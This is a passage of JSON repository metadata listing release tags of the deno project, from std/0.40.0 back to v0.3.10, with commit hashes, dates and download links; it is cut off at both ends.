","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/m